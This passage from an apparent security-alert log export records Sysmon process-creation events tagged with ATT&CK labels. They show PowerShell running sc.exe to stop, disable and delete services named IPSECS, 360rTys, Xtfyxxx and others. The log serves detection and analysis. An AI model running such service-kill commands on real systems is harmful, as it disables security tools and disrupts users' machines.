MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.122013000Z"",""eventRecordID"":""3851"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.118\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001020ba3000}\r\nProcessId: 6384\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.118"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001020ba3000}"",""processId"":""6384"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.246",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.091 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001031b93000} +ProcessId: 5396 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.097265400Z"",""eventRecordID"":""3850"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.091\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001031b93000}\r\nProcessId: 5396\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.091"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001031b93000}"",""processId"":""5396"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.187",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.942 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001043b63000} +ProcessId: 2344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.945523800Z"",""eventRecordID"":""3847"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.942\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001043b63000}\r\nProcessId: 2344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.942"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001043b63000}"",""processId"":""2344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.139",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.791 +ProcessGuid: 
{df9fc3d3-b413-5ecf-0000-001040b33000} +ProcessId: 6672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.804236000Z"",""eventRecordID"":""3844"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.791\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001040b33000}\r\nProcessId: 6672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.791"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001040b33000}"",""processId"":""6672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 
29, 2020 @ 14:21:04.124",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.753 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001060b23000} +ProcessId: 8076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfyxxx Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfyxxx Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.760384100Z"",""eventRecordID"":""3843"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.753\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001060b23000}\r\nProcessId: 8076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfyxxx Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.753"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001060b23000}"",""processId"":""8076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfyxxx Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.983",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.710 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010afb03000} +ProcessId: 7804 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.714248400Z"",""eventRecordID"":""3841"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.710\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010afb03000}\r\nProcessId: 7804\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.710"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010afb03000}"",""processId"":""7804"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.944",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.660 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001034ae3000} +ProcessId: 5104 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
